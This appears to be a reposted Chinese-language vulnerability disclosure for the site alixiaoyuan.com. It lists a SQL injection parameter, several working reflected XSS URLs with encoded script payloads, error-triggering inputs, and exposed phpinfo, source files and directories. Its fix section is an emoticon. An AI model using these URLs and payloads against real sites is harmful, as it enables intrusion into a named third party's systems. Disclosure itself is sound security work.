SQL注入,跨站什么的。。 详细说明:1.SQL注入 注入URL:http://www.alixiaoyuan.com/index.php?app=campusgroupbuy&cateID=1 注入参数:cateID 2.跨站 http://wh.alixiaoyuan.com/?app=buy&city_id=%22%20onmouseover%3dprompt%28970140%29%20bad%3d%22&group_id=17 http://wh.alixiaoyuan.com/?address=%E6%B1%9F%E5%AE%81%E5%8C%BA%E5%8F%8C%E9%BE%99%E5%A4%A7%E9%81%93&app=store_map&id=62&map=118.785401,32.000455&sname=store&store_name=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28997246%29%3c%2fScRiPt%3e http://wh.alixiaoyuan.com/index.php?act=index&app=search&keyword=1&searchBtn=1&type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28973765%29%3c%2fScRiPt%3e http://wh.alixiaoyuan.com/index.php?app=campusgroupbuy&cateID=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28964089%29%3c%2fScRiPt%3e 3.敏感信息泄漏 http://www.alixiaoyuan.com/?app=buy&city_id=1‘&group_id=17 http://www.alixiaoyuan.com/index.php?app=campusgroupbuy&cateID=1%27%22 http://www.alixiaoyuan.com/?app=buy&city_id=1%27%22&group_id=17 http://www.alixiaoyuan.com/external/modules/datacall/module.info.php ………………………………. 4.phpinfo http://www.alixiaoyuan.com/info.php 5. 源码 泄露 http://www.alixiaoyuan.com/phpmyadmin/scripts/upgrade.pl http://www.alixiaoyuan.com/themes/mall/default/styles/default/images/member/thumbs.db http://www.alixiaoyuan.com/themes/store/default/groupbuy.index. html 6.目录泄漏 http://www.alixiaoyuan.com/api/ http://www.alixiaoyuan.com/data/ http://www.alixiaoyuan.com/data/files …………………
修复方案: =-=~
查看更多关于阿里校园多个漏洞及修复 - 网站安全 - 自学php的详细内容...